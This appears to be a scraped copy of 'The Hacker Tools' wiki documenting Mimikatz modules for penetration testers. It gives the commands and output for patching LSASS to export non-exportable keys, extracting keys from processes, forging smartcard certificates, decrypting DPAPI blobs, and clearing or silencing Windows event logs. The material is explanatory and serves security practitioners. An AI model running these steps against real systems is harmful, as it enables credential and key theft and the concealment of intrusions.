# Table of Contents - [Mimikatz 🥝 | The Hacker Tools](#mimikatz-the-hacker-tools) - [Introduction | The Hacker Tools](#introduction-the-hacker-tools) - [General 🛠️ | The Hacker Tools](#general-the-hacker-tools) - [crypto | The Hacker Tools](#crypto-the-hacker-tools) - [cng | The Hacker Tools](#cng-the-hacker-tools) - [capi | The Hacker Tools](#capi-the-hacker-tools) - [kutil 🛠️ | The Hacker Tools](#kutil-the-hacker-tools) - [extract | The Hacker Tools](#extract-the-hacker-tools) - [certificates | The Hacker Tools](#certificates-the-hacker-tools) - [certtohw | The Hacker Tools](#certtohw-the-hacker-tools) - [keys | The Hacker Tools](#keys-the-hacker-tools) - [providers | The Hacker Tools](#providers-the-hacker-tools) - [hash | The Hacker Tools](#hash-the-hacker-tools) - [system | The Hacker Tools](#system-the-hacker-tools) - [tpminfo | The Hacker Tools](#tpminfo-the-hacker-tools) - [sc | The Hacker Tools](#sc-the-hacker-tools) - [stores | The Hacker Tools](#stores-the-hacker-tools) - [drop | The Hacker Tools](#drop-the-hacker-tools) - [scauth 🛠️ | The Hacker Tools](#scauth-the-hacker-tools) - [clear | The Hacker Tools](#clear-the-hacker-tools) - [event | The Hacker Tools](#event-the-hacker-tools) - [dpapi | The Hacker Tools](#dpapi-the-hacker-tools) - [blob | The Hacker Tools](#blob-the-hacker-tools) - [cloudapreg | The Hacker Tools](#cloudapreg-the-hacker-tools) - [chrome | The Hacker Tools](#chrome-the-hacker-tools) - [hash | The Hacker Tools](#hash-the-hacker-tools) - [purge | The Hacker Tools](#purge-the-hacker-tools) - [SMB | The Hacker Tools](#smb-the-hacker-tools) - [NTLM | The Hacker Tools](#ntlm-the-hacker-tools) - [Hashcat | The Hacker Tools](#hashcat-the-hacker-tools) - [MSRPC | The Hacker Tools](#msrpc-the-hacker-tools) - [Kerberos | The Hacker Tools](#kerberos-the-hacker-tools) - [LDAP | The Hacker Tools](#ldap-the-hacker-tools) - [Library | The Hacker Tools](#library-the-hacker-tools) - [Impacket | The Hacker Tools](#impacket-the-hacker-tools) - [revert | The Hacker Tools](#revert-the-hacker-tools) - [mstsc | The Hacker Tools](#mstsc-the-hacker-tools) - [vault | The Hacker Tools](#vault-the-hacker-tools) - [list | The Hacker Tools](#list-the-hacker-tools) - [cred | The Hacker Tools](#cred-the-hacker-tools) - [logonpasswords | The Hacker Tools](#logonpasswords-the-hacker-tools) - [ts | The Hacker Tools](#ts-the-hacker-tools) - [multirdp | The Hacker Tools](#multirdp-the-hacker-tools) - [localtime | The Hacker Tools](#localtime-the-hacker-tools) - [sleep | The Hacker Tools](#sleep-the-hacker-tools) - [log | The Hacker Tools](#log-the-hacker-tools) - [version | The Hacker Tools](#version-the-hacker-tools) - [remote | The Hacker Tools](#remote-the-hacker-tools) - [token | The Hacker Tools](#token-the-hacker-tools) - [sessions | The Hacker Tools](#sessions-the-hacker-tools) - [run | The Hacker Tools](#run-the-hacker-tools) - [list | The Hacker Tools](#list-the-hacker-tools) - [whoami | The Hacker Tools](#whoami-the-hacker-tools) - [findDelegation.py | The Hacker Tools](#finddelegation-py-the-hacker-tools) - [dpapi.py | The Hacker Tools](#dpapi-py-the-hacker-tools) - [getST.py | The Hacker Tools](#getst-py-the-hacker-tools) - [nmapAnswerMachine.py | The Hacker Tools](#nmapanswermachine-py-the-hacker-tools) - [ntlmrelayx.py | The Hacker Tools](#ntlmrelayx-py-the-hacker-tools) - [GetADUsers.py | The Hacker Tools](#getadusers-py-the-hacker-tools) - [getPac.py | The Hacker Tools](#getpac-py-the-hacker-tools) - [mimikatz.py | The Hacker Tools](#mimikatz-py-the-hacker-tools) - [ntfs-read.py | The Hacker Tools](#ntfs-read-py-the-hacker-tools) - [karmaSMB.py | The Hacker Tools](#karmasmb-py-the-hacker-tools) - [ping.py | The Hacker Tools](#ping-py-the-hacker-tools) - [smbpasswd.py | The Hacker Tools](#smbpasswd-py-the-hacker-tools) - [Script examples | The Hacker Tools](#script-examples-the-hacker-tools) - [smbserver.py | The Hacker Tools](#smbserver-py-the-hacker-tools) - [netview.py | The Hacker Tools](#netview-py-the-hacker-tools) - [rdp_check.py | The Hacker Tools](#rdp-check-py-the-hacker-tools) - [mqtt_check.py | The Hacker Tools](#mqtt-check-py-the-hacker-tools) - [sniff.py | The Hacker Tools](#sniff-py-the-hacker-tools) - [lookupsid.py | The Hacker Tools](#lookupsid-py-the-hacker-tools) - [ticketer.py | The Hacker Tools](#ticketer-py-the-hacker-tools) - [rpcdump.py | The Hacker Tools](#rpcdump-py-the-hacker-tools) - [dcomexec.py | The Hacker Tools](#dcomexec-py-the-hacker-tools) - [esentutl.py | The Hacker Tools](#esentutl-py-the-hacker-tools) - [kintercept.py | The Hacker Tools](#kintercept-py-the-hacker-tools) - [ticketConverter.py | The Hacker Tools](#ticketconverter-py-the-hacker-tools) - [ping6.py | The Hacker Tools](#ping6-py-the-hacker-tools) - [reg.py | The Hacker Tools](#reg-py-the-hacker-tools) - [atexec.py | The Hacker Tools](#atexec-py-the-hacker-tools) - [psexec.py | The Hacker Tools](#psexec-py-the-hacker-tools) - [rpcmap.py | The Hacker Tools](#rpcmap-py-the-hacker-tools) - [registry-read.py | The Hacker Tools](#registry-read-py-the-hacker-tools) - [samrdump.py | The Hacker Tools](#samrdump-py-the-hacker-tools) - [smbexec.py | The Hacker Tools](#smbexec-py-the-hacker-tools) - [smbrelayx.py | The Hacker Tools](#smbrelayx-py-the-hacker-tools) - [GetNPUsers.py | The Hacker Tools](#getnpusers-py-the-hacker-tools) - [mssqlinstance.py | The Hacker Tools](#mssqlinstance-py-the-hacker-tools) - [wmipersist.py | The Hacker Tools](#wmipersist-py-the-hacker-tools) - [getArch.py | The Hacker Tools](#getarch-py-the-hacker-tools) - [sambaPipe.py | The Hacker Tools](#sambapipe-py-the-hacker-tools) - [sniffer.py | The Hacker Tools](#sniffer-py-the-hacker-tools) - [exchanger.py | The Hacker Tools](#exchanger-py-the-hacker-tools) - [raiseChild.py | The Hacker Tools](#raisechild-py-the-hacker-tools) - [mssqlclient.py | The Hacker Tools](#mssqlclient-py-the-hacker-tools) - [GetUserSPNs.py | The Hacker Tools](#getuserspns-py-the-hacker-tools) - [wmiquery.py | The Hacker Tools](#wmiquery-py-the-hacker-tools) - [split.py | The Hacker Tools](#split-py-the-hacker-tools) - [getTGT.py | The Hacker Tools](#gettgt-py-the-hacker-tools) - [secretsdump.py | The Hacker Tools](#secretsdump-py-the-hacker-tools) - [wmiexec.py | The Hacker Tools](#wmiexec-py-the-hacker-tools) - [services.py | The Hacker Tools](#services-py-the-hacker-tools) - [goldenPac.py | The Hacker Tools](#goldenpac-py-the-hacker-tools) - [smbclient.py | The Hacker Tools](#smbclient-py-the-hacker-tools) - [Get-GPPPassword.py | The Hacker Tools](#get-gpppassword-py-the-hacker-tools) - [addcomputer.py | The Hacker Tools](#addcomputer-py-the-hacker-tools) - [Email Protection | Cloudflare](#email-protection-cloudflare) --- # Mimikatz 🥝 | The Hacker Tools [General 🛠️](https://tools.thehacker.recipes/mimikatz/general) [Modules](https://tools.thehacker.recipes/mimikatz/modules) [PreviousIntroduction](https://tools.thehacker.recipes/) [NextGeneral 🛠️](https://tools.thehacker.recipes/mimikatz/general) Last updated 3 years ago --- # Introduction | The Hacker Tools ![](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2F894632015-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MiRT0QHotSpofwDFs_w%252Fuploads%252FUWh0q3d1qIgQj4dMpgyj%252Frounded%2520social%2520preview_v2.png%3Falt%3Dmedia%26token%3D31f1a399-6e23-48a8-b902-463325f3ef25&width=768&dpr=4&quality=100&sign=d13595e1&sv=2) **This project is part of** [**The Hacker Recipes**](https://www.thehacker.recipes/) **and is a work in progress**. I started it in 2021 and have absolutely no idea when this could be finished (will it ever be?). The Hacker Tools is focused on documenting and giving tips & tricks on common infosec tools The 🛠️ emoji is used where work has to be done. This project is aimed at providing technical guides on various hacking tools. Keep in mind that these guides are maintained by non-omniscient security enthusiasts in their spare time. You will probably find things missing or mistakes. 📣 Please feel free to contribute, give feedback/suggestions or reach out to me on Twitter ([@\_nwodtuhs](https://twitter.com/_nwodtuhs) ), Discord (Shutdown#2539), IRL or whatever you feel appropriate. Almost every tool mentioned in theses notes is installed, and sometimes pre-configured, in [Exegol](https://github.com/ShutdownRepo/Exegol) , another project of mine of a docker environment ready to hack on day-to-day engagements. It's not much but I use it on all my engagements. Feel free to use it, to contribute, to give feedback etc. [NextMimikatz 🥝](https://tools.thehacker.recipes/mimikatz) Last updated 2 years ago --- # General 🛠️ | The Hacker Tools Work in progress At the time of writing, 17th December 2021, only the [modules](https://tools.thehacker.recipes/mimikatz/modules) are documented. In a near future, this part will feature information regarding AV bypass, "installation/setup", compilation, and other misc and general information to help people understand and use Mimikatz. [PreviousMimikatz 🥝](https://tools.thehacker.recipes/mimikatz) [NextModules](https://tools.thehacker.recipes/mimikatz/modules) Last updated 3 years ago --- # crypto | The Hacker Tools [capi](https://tools.thehacker.recipes/mimikatz/modules/crypto/capi) [certificates](https://tools.thehacker.recipes/mimikatz/modules/crypto/certificates) [certtohw](https://tools.thehacker.recipes/mimikatz/modules/crypto/certtohw) [cng](https://tools.thehacker.recipes/mimikatz/modules/crypto/cng) [extract](https://tools.thehacker.recipes/mimikatz/modules/crypto/extract) [hash](https://tools.thehacker.recipes/mimikatz/modules/crypto/hash) [keys](https://tools.thehacker.recipes/mimikatz/modules/crypto/keys) [kutil 🛠️](https://tools.thehacker.recipes/mimikatz/modules/crypto/kutil) [providers](https://tools.thehacker.recipes/mimikatz/modules/crypto/providers) [sc](https://tools.thehacker.recipes/mimikatz/modules/crypto/sc) [scauth 🛠️](https://tools.thehacker.recipes/mimikatz/modules/crypto/scauth) [stores](https://tools.thehacker.recipes/mimikatz/modules/crypto/stores) [system](https://tools.thehacker.recipes/mimikatz/modules/crypto/system) [tpminfo](https://tools.thehacker.recipes/mimikatz/modules/crypto/tpminfo) [PreviousModules](https://tools.thehacker.recipes/mimikatz/modules) [Nextcapi](https://tools.thehacker.recipes/mimikatz/modules/crypto/capi) Last updated 3 years ago --- # cng | The Hacker Tools `crypto::cng` patches the CNG (Cryptography API: Next Generation) service for easy export (Experimental ⚠️). This patch modifies `KeyIso` service, in `LSASS` process, in order to make unexportable keys, exportable. This is only useful when the keys provider is `Microsoft Software Key Storage Provider` (you do **not** need to patch `CNG` for other providers). It can be used with [`crypto::certificates`](https://tools.thehacker.recipes/mimikatz/modules/crypto/certificates) and [`crypto::keys`](https://tools.thehacker.recipes/mimikatz/modules/crypto/keys) . Copy mimikatz # privilege::debug Privilege '20' OK mimikatz # crypto::cng "KeyIso" service patched [Previouscerttohw](https://tools.thehacker.recipes/mimikatz/modules/crypto/certtohw) [Nextextract](https://tools.thehacker.recipes/mimikatz/modules/crypto/extract) Last updated 3 years ago --- # capi | The Hacker Tools `crypto::capi` patches CryptoAPI layer for easy export (Experimental ⚠️). This patch modifies a `CryptoAPI` function, in the `mimikatz` process, in order to make unexportable keys, exportable (no specific right other than access to the private key is needed). It can be used with [`crypto::certificates`](https://tools.thehacker.recipes/mimikatz/modules/crypto/certificates) and [`crypto::keys`](https://tools.thehacker.recipes/mimikatz/modules/crypto/keys) . This is only useful when the keys provider is one of: * `Microsoft Base Cryptographic Provider v1.0` * `Microsoft Enhanced Cryptographic Provider v1.0` * `Microsoft Enhanced RSA and AES Cryptographic Provider` * `Microsoft RSA SChannel Cryptographic Provider` * `Microsoft Strong Cryptographic Provider` Copy mimikatz # crypto::capi Local CryptoAPI patched [Previouscrypto](https://tools.thehacker.recipes/mimikatz/modules/crypto) [Nextcertificates](https://tools.thehacker.recipes/mimikatz/modules/crypto/certificates) Last updated 3 years ago --- # kutil 🛠️ | The Hacker Tools Work in Progress [Previouskeys](https://tools.thehacker.recipes/mimikatz/modules/crypto/keys) [Nextproviders](https://tools.thehacker.recipes/mimikatz/modules/crypto/providers) Last updated 3 years ago --- # extract | The Hacker Tools `crypto::extract` extracts keys from the CAPI RSA/AES provider (Experimental ⚠️). Copy mimikatz # crypto::extract lsass.exe (816) AlgId : 3DES (0x10005) Mode : ChainingModeCBC (0x1) IV : 8a8c03aa5722b0ea Key ( 24) : 1a4202f442ebde5aa20d72ea32ed1c30a83ee5ce2048a50a AlgId : AES (0x10002) Mode : ChainingModeCFB (0x3) Key ( 16) : 213d8d48ff884017252091c4c3361b38 AlgId : RC4 (0x10001) Mode : ChainingModeN/A (0x0) Key ( 16) : ee9eb08d70250d26e6f6c4cb8d92df5d AlgId : RC4 (0x10001) Mode : ChainingModeN/A (0x0) Key ( 16) : de3f10f59ca7c63edb40e06dd152a7e0 AlgId : RSA (0x30001) PubExp : 4d11aa323757497ef5de5d526b8ba2502e6053aa9a6d55d2c2d2edcb310e6007550bf09c0fa5cf15da082fadf07398fab29fd803ad048235d95e2ee88e3c3ff39e083eaee1ac0d079b2b6664731742dfbb2fea5f39bfc6f59c0e3e724a27759a2c79d7c4c703c99256e1a664f278acb27cf015711ad9791424aee001f869d5f10c8b951aa5d561aa0dea8ce71d486d19ad632dac057143a25b1090d69d38fa03b2c794398cde74e4b57f3eee63573bcf144b392c86d57b66892afbce9ab5106bee7c03a5bb5cb4534f40c0e723a0905b4b9b38ee9504e7bb9357d880993e3bc2f353f2b92bd13b709758a9ac44fba685eb03a5b1c02db25893419888b0d27610 Modulus : d70e7b5f8512f1698cf946d06c88e79bb8dd040bb5fb50e1b3291142feedb4a03732d12bd2ed8b2dd81dc3a546b46c34e82b202a59c01c8dc9ac3b6b6dcf3fb0a15fae7b632d643daf74e491284757f43ad3ff59ef78ce1f1f9b50325841d9343664bf1b8b56358a5a998ace10dab26977cfdc3b3a5e24809e665bb6b1292ee5 Prime1 : d70e7b5f8512f1698cf946d06c88e79bb8dd040bb5fb50e1b3291142feedb4a03732d12bd2ed8b2dd81dc3a546b46c34e82b202a59c01c8dc9ac3b6b6dcf3fb0a15fae7b632d643daf74e491284757f43ad3ff59ef78ce1f1f9b50325841d9343664bf1b8b56358a5a998ace10dab26977cfdc3b3a5e24809e665bb6b1292ee5 Prime2 : 8b50756840dc6f1e3e3ac17b0a977d7ffe7dcef561d8a8f9e73e5530c213722cbb7725bab3334cc18b432954d3f6a425b82d0188fdc39825b1fc2743b2ade05e60e949dbd06d66a8823192d80afd6d92736b2bbd3a07654a680ba90084a5066ff180c3a1fe28d5ba8617fb6fadb383763f5261abfe4e0a45f0c8490f55bd09c5 AlgId : RSA (0x30001) AlgId : AES (0x10002) Mode : ChainingModeCBC (0x1) Key ( 32) : 6d9fc1ae597be017a7e44c9b41dae46f5b690d01f7642043e0a0180197e1e2bb AlgId : AES (0x10002) Mode : ChainingModeCBC (0x1) Key ( 16) : 932b41c722cdc1e2b9291b2789ca664b svchost.exe (2328) svchost.exe (5244) AlgId : ECDSA_P256 (0x30004) AlgId : ECDSA_P256 (0x30004) chrome.exe (8300) Algid : CALG_RSA_KEYX (0xa400) Key (284) : 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe (7084) [Previouscng](https://tools.thehacker.recipes/mimikatz/modules/crypto/cng) [Nexthash](https://tools.thehacker.recipes/mimikatz/modules/crypto/hash) Last updated 3 years ago --- # certificates | The Hacker Tools `crypto::certificates` lists or exports certificates. It has the following command line arguments: * `/systemstore`: the system store that must be used (default: `CERT_SYSTEM_STORE_CURRENT_USER`) * `/store`: the store that must be used to list/export certificates (default: `My`) - full list with `crypto::stores` * `/export`: export all certificates to files (public parts in `DER`, private parts in `PFX` files - password protected with: `mimikatz`) * `/silent`: if user interaction is required, then abort * `/nokey`: do not try to interact with the private key Copy mimikatz # crypto::capi Local CryptoAPI patched mimikatz # privilege::debug Privilege '20' OK mimikatz # crypto::cng "KeyIso" service patched mimikatz # crypto::certificates /systemstore:local_machine /store:my /export * System Store : 'local_machine' (0x00020000) * Store : 'my' 0. example.domain.local Key Container : example.domain.local Provider : Microsoft Software Key Storage Provider Type : CNG Key (0xffffffff) Exportable key : NO Key size : 2048 Public export : OK - 'local_machine_my_0_example.domain.local.der' Private export : OK - 'local_machine_my_0_example.domain.local.pfx' [Previouscapi](https://tools.thehacker.recipes/mimikatz/modules/crypto/capi) [Nextcerttohw](https://tools.thehacker.recipes/mimikatz/modules/crypto/certtohw) Last updated 3 years ago --- # certtohw | The Hacker Tools `crypto::certtohw` tries to export a software CA to a crypto (virtual) hardware. It has the following command line arguments: * `/csp`: the crypto certificate provider * `/name`: the name of the certificate * `/store`: the store that must be used to list/export certificates (default: `My`) - full list with [`crypto::stores`](https://tools.thehacker.recipes/mimikatz/modules/crypto/stores) . [Previouscertificates](https://tools.thehacker.recipes/mimikatz/modules/crypto/certificates) [Nextcng](https://tools.thehacker.recipes/mimikatz/modules/crypto/cng) Last updated 3 years ago --- # keys | The Hacker Tools `crypto::keys` lists or exports key containers. It has the following command line arguments: * `/provider`: the legacy `CryptoAPI` provider (default: `MS_ENHANCED_PROV`) * `/providertype`: the legacy `CryptoAPI` provider type (default: `PROV_RSA_FULL`) * `/cngprovider`: the `CNG` provider (default: `Microsoft Software Key Storage Provider`) * `/export`: export all keys to `PVK` files * `/silent`: if user interaction is required, then abort If needed, you can convert `PVK` files with: `openssl rsa -inform pvk -in key.pvk -outform pem -out key.pem` Copy mimikatz # crypto::keys /export * Store : 'user' * Provider : 'MS_ENHANCED_PROV' ('Microsoft Enhanced Cryptographic Provider v1.0') * Provider type : 'PROV_RSA_FULL' (1) * CNG Provider : 'Microsoft Software Key Storage Provider' CryptoAPI keys : CNG keys : 0. Microsoft Connected Devices Platform device certificate |Provider name : Microsoft Software Key Storage Provider |Implementation: NCRYPT_IMPL_SOFTWARE_FLAG ; Key Container : Microsoft Connected Devices Platform device certificate Unique name : de7cf8a7901d2ad13e5c67c29e5d1662_e4aad2d1-5ec0-4ea4-b259-65eda5bc47a8 Algorithm : ECDSA_P256 Key size : 256 (0x00000100) Export policy : 00000003 ( NCRYPT_ALLOW_EXPORT_FLAG ; NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG ; ) Exportable key : YES LSA isolation : NO Private export : OK - 'user_cng_0_Microsoft Connected Devices Platform device certificate.dsa.ec.p8k' [Previoushash](https://tools.thehacker.recipes/mimikatz/modules/crypto/hash) [Nextkutil 🛠️](https://tools.thehacker.recipes/mimikatz/modules/crypto/kutil) Last updated 3 years ago --- # providers | The Hacker Tools `crypto::providers` lists cryptographic providers. This module, one of the oldest, plays with `CryptoAPI` functions. Basically it's a little `certutil` that features token impersonation, patches legacy `CryptoAPI` functions and patches `CNG` key isolation service. Copy mimikatz # crypto::providers CryptoAPI providers : 0. RSA_FULL ( 1) - Microsoft Base Cryptographic Provider v1.0 1. DSS_DH (13) - Microsoft Base DSS and Diffie-Hellman Cryptographic Provider 2. DSS ( 3) - Microsoft Base DSS Cryptographic Provider 3. RSA_FULL ( 1) H - Microsoft Base Smart Card Crypto Provider 4. DH_SCHANNEL (18) - Microsoft DH SChannel Cryptographic Provider 5. RSA_FULL ( 1) - Microsoft Enhanced Cryptographic Provider v1.0 6. DSS_DH (13) - Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider 7. RSA_AES (24) - Microsoft Enhanced RSA and AES Cryptographic Provider 8. RSA_SCHANNEL (12) - Microsoft RSA SChannel Cryptographic Provider 9. RSA_FULL ( 1) - Microsoft Strong Cryptographic Provider CryptoAPI provider types: 0. RSA_FULL ( 1) - RSA Full (Signature and Key Exchange) 1. DSS ( 3) - DSS Signature 2. RSA_SCHANNEL (12) - RSA SChannel 3. DSS_DH (13) - DSS Signature with Diffie-Hellman Key Exchange 4. DH_SCHANNEL (18) - Diffie-Hellman SChannel 5. RSA_AES (24) - RSA Full and AES CNG providers : 0. Kiwi Random TPM Provider 1. Microsoft Key Protection Provider 2. Microsoft Passport Key Storage Provider 3. Microsoft Platform Crypto Provider 4. Microsoft Primitive Provider 5. Microsoft Smart Card Key Storage Provider 6. Microsoft Software Key Storage Provider 7. Microsoft SSL Protocol Provider 8. Windows Client Key Protection Provider [Previouskutil 🛠️](https://tools.thehacker.recipes/mimikatz/modules/crypto/kutil) [Nextsc](https://tools.thehacker.recipes/mimikatz/modules/crypto/sc) Last updated 3 years ago --- # hash | The Hacker Tools `crypto::hash` hashes a password in the main formats (NT, DCC1, DCC2, LM, MD5, SHA1, SHA2) with the username being an optional value. It has the following command line argument: * `/count`: number of iterations for the salted hashes LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called NTLM hash and many documentations, resources, blogpost and tools mix terms. In this case, "NTLM" refers to the NT hash. ([more information](https://www.thehacker.recipes/ad/movement/ntlm) ) Copy mimikatz # crypto::hash /user:test /password:password NTLM: 8846f7eaee8fb117ad06bdd830b7586c DCC1: 1f34a7dfade9ddaa26746086ecbe77bf DCC2: a86012faf7d88d1fc037a69764a92cac LM : e52cac67419a9a224a3b108f3fa6cb6d MD5 : b081dbe85e1ec3ffc3d4e7d0227400cd SHA1: e8f97fba9104d1ea5047948e6dfb67facd9f5b73 SHA2: e201065d0554652615c320c00a1d5bc8edca469d72c2790e24152d0c1e2b6189 [Previousextract](https://tools.thehacker.recipes/mimikatz/modules/crypto/extract) [Nextkeys](https://tools.thehacker.recipes/mimikatz/modules/crypto/keys) Last updated 3 years ago --- # system | The Hacker Tools `crypto::system` it describes a Windows System Certificate. It as the following command line arguments: * `/file:` the path of the certificate * `/export:` export to a _**.der**_ file The following output was taken from [this](https://tinyapps.org/docs/decrypt-efs-without-cert-backup.html) guide: Copy mimikatz # crypto::system /file:"SystemCertificates\My\Certificates\096BA4D021B50F5E78F2B9854A7461678EDAA006" /export ... Key Container : d209e940-6952-4c9d-b906-372d5a3dbd50 Provider : Microsoft Enhanced Cryptographic Provider v1.0 ... Saved to file: 096BA4D021B50F5E78F2B9854A7461678EDAA006.der [Previousstores](https://tools.thehacker.recipes/mimikatz/modules/crypto/stores) [Nexttpminfo](https://tools.thehacker.recipes/mimikatz/modules/crypto/tpminfo) Last updated 3 years ago --- # tpminfo | The Hacker Tools `crypto::tpminfo` displays information for the Microsoft's TPM Platform Crypto Provider. Copy mimikatz# crypto::tpminfo [Previoussystem](https://tools.thehacker.recipes/mimikatz/modules/crypto/system) [Nextdpapi](https://tools.thehacker.recipes/mimikatz/modules/dpapi) Last updated 3 years ago --- # sc | The Hacker Tools `crypto::sc` lists smartcard/token reader(s) on, or deported to, the system. When the CSP (Cryptographic Service Provider) is available, it tries to list keys on the smartcard. Copy mimikatz # crypto::sc SmartCard readers: * OMNIKEY CardMan 3x21 0 ATR : 3bb794008131fe6553504b32339000d1 Model: G&D SPK 2.3 T=1 CSP : SafeSign Standard Cryptographic Service Provider 0. 34C99D73A1FAE4D44F9966DF626623DF18858C83 34C99D73A1FAE4D44F9966DF626623DF18858C83 Type : AT_KEYEXCHANGE (0x00000001) Exportable key : NO Key size : 1024 * SCM Microsystems Inc. SCR35xx USB Smart Card Reader 0 [Previousproviders](https://tools.thehacker.recipes/mimikatz/modules/crypto/providers) [Nextscauth 🛠️](https://tools.thehacker.recipes/mimikatz/modules/crypto/scauth) Last updated 3 years ago --- # stores | The Hacker Tools `crypto::stores` lists cryptographic stores. It has the following command line argument: * `/systemstore`: the system store that must be used to list stores (default: `CERT_SYSTEM_STORE_CURRENT_USER`) The `/systemstore` can also be one of the following: * `CERT_SYSTEM_STORE_CURRENT_USER` or `CURRENT_USER` * `CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY` or `USER_GROUP_POLICY` * `CERT_SYSTEM_STORE_LOCAL_MACHINE` or `LOCAL_MACHINE` * `CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY` or `LOCAL_MACHINE_GROUP_POLICY` * `CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE` or `LOCAL_MACHINE_ENTERPRISE` * `CERT_SYSTEM_STORE_CURRENT_SERVICE` or `CURRENT_SERVICE` * `CERT_SYSTEM_STORE_USERS` or `USERS` * `CERT_SYSTEM_STORE_SERVICES` or `SERVICES` Copy mimikatz # crypto::stores Asking for System Store 'CURRENT_USER' (0x00010000) 0. My 1. Root 2. Trust 3. CA 4. UserDS 5. TrustedPublisher 6. Disallowed 7. AuthRoot 8. TrustedPeople 9. ClientAuthIssuer 10. ACRS 11. SmartCardRoot Copy mimikatz # crypto::stores /systemstore:local_machine Asking for System Store 'local_machine' (0x00020000) 0. My 1. Root 2. Trust 3. CA 4. TrustedPublisher 5. Disallowed 6. AuthRoot 7. TrustedPeople 8. ClientAuthIssuer 9. FlightRoot 10. TestSignRoot 11. AAD Token Issuer 12. eSIM Certification Authorities 13. Homegroup Machine Certificates 14. Remote Desktop 15. SmartCardRoot 16. TrustedAppRoot 17. TrustedDevices 18. Windows Live ID Token Issuer 19. WindowsServerUpdateServices [Previousscauth 🛠️](https://tools.thehacker.recipes/mimikatz/modules/crypto/scauth) [Nextsystem](https://tools.thehacker.recipes/mimikatz/modules/crypto/system) Last updated 3 years ago --- # drop | The Hacker Tools `event::drop` can be used to patch event services to avoid new events ( ⚠️ experimental) Copy mimikatz # privilege::debug Privilege '20' OK Copy mimikatz # event::drop "EventLog" service patched [Previousclear](https://tools.thehacker.recipes/mimikatz/modules/event/clear) [Nextkerberos](https://tools.thehacker.recipes/mimikatz/modules/kerberos) Last updated 3 years ago --- # scauth 🛠️ | The Hacker Tools Work in progress `crypto::scauth` it creates a authentication certificate (smartcard like) from a CA. It has the following command line arguments: * `/hw:` at the time of writing, 17th December 2021, we don't know what this option is used for * `/csp:` the crypto certificate provider * `/pin:` the smartcard PIN * `/nostore:` do not interact with the store * `/caname`: the subject name of the certificate authority (needed to sign the certificate) * `/castore`: the system store that contains the certificate authority (default: `CERT_SYSTEM_STORE_LOCAL_MACHINE`) * `/upn`: the User Principal Name (UPN) targeted (eg: `[[email protected]](https://tools.thehacker.recipes/cdn-cgi/l/email-protection) `) * `/pfx`: the filename for saving the final certificate (default: no file, stored in `CERT_SYSTEM_STORE_CURRENT_USER`) Copy mimikatz # crypto::scauth /caname:KiwiAC /upn:[email protected] /pfx:user.pfx CA store : LOCAL_MACHINE CA name : KiwiAC CA validity : 22/08/2016 22:00:36 -> 22/08/2021 22:10:35 Certificate UPN: [email protected] Key container : {a1bd29ec-4203-4aac-8159-40f28f96335b} Key provider : Microsoft Enhanced Cryptographic Provider v1.0 Private Export : user.pfx - OK [Previoussc](https://tools.thehacker.recipes/mimikatz/modules/crypto/sc) [Nextstores](https://tools.thehacker.recipes/mimikatz/modules/crypto/stores) Last updated 3 years ago --- # clear | The Hacker Tools `event::clear` clears a specified event log. It has the following command line argument: * `/log`: The event log to clear. The default one is **Security** Copy mimikatz # privilege::debug Privilege '20' OK Copy mimikatz # event::clear Using "Security" event log : - 3996 event(s) - Cleared ! - 0 event(s) Copy mimikatz # event::clear /log:System Using "System" event log : - 818 event(s) - Cleared ! - 0 event(s) [Previousevent](https://tools.thehacker.recipes/mimikatz/modules/event) [Nextdrop](https://tools.thehacker.recipes/mimikatz/modules/event/drop) Last updated 3 years ago --- # event | The Hacker Tools The Windows events module of Mimikatz [Previouswwan](https://tools.thehacker.recipes/mimikatz/modules/dpapi/wwan) [Nextclear](https://tools.thehacker.recipes/mimikatz/modules/event/clear) Last updated 3 years ago --- # dpapi | The Hacker Tools Benjamin has published an [Excel spreadsheet](https://onedrive.live.com/view.aspx?resid=A352EBC5934F0254!3104&ithint=file%2cxlsx&authkey=!ACGFg7R-U5xkTh4) with Windows file paths for the corresponding DPAPI section. [Previoustpminfo](https://tools.thehacker.recipes/mimikatz/modules/crypto/tpminfo) [Nextblob](https://tools.thehacker.recipes/mimikatz/modules/dpapi/blob) Last updated 3 years ago --- # blob | The Hacker Tools `dpapi::blob` describes a DPAPI blob and unprotects/decrypts it with API or Masterkey. It has the following command line arguments: * `/in`: the path to the blob file * `/raw`: the blob data in raw format * `/out`: the path to save the results * `/ascii`: the blob data in ASCII format * `/password`: the password to decrypt the blob * `/unprotect`: displays the decryption results on screen * `/masterkey`: the masterkey to use for decryption. It can be obtained through [`sekurlsa::dpapi`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/dpapi) . Copy mimikatz # dpapi::blob /in:dpapi_blob.txt /unprotect **BLOB** dwVersion : 00000001 - 1 guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} dwMasterKeyVersion : 00000001 - 1 guidMasterKey : {5c22983f-77ee-41e4-9086-8073d664e417} dwFlags : 00000000 - 0 () dwDescriptionLen : 00000002 - 2 szDescription : algCrypt : 00006603 - 26115 (CALG_3DES) dwAlgCryptLen : 000000c0 - 192 dwSaltLen : 00000010 - 16 pbSalt : 6bccc6a1e6ba8ae74d99fc0801bdc502 dwHmacKeyLen : 00000000 - 0 pbHmackKey : algHash : 00008004 - 32772 (CALG_SHA1) dwAlgHashLen : 000000a0 - 160 dwHmac2KeyLen : 00000010 - 16 pbHmack2Key : 2a31aa666d7a0efb8b140df7709d0814 dwDataLen : 00000020 - 32 pbData : 679f2ed4ef2829dd49f94fb46ebd575b7d545a92d762bbedbf384eece6a69599 dwSignLen : 00000014 - 20 pbSign : e57681477a7407acceb724c385243070cc7aa6ba * using CryptUnprotectData API description : data: Hello Mimikatz 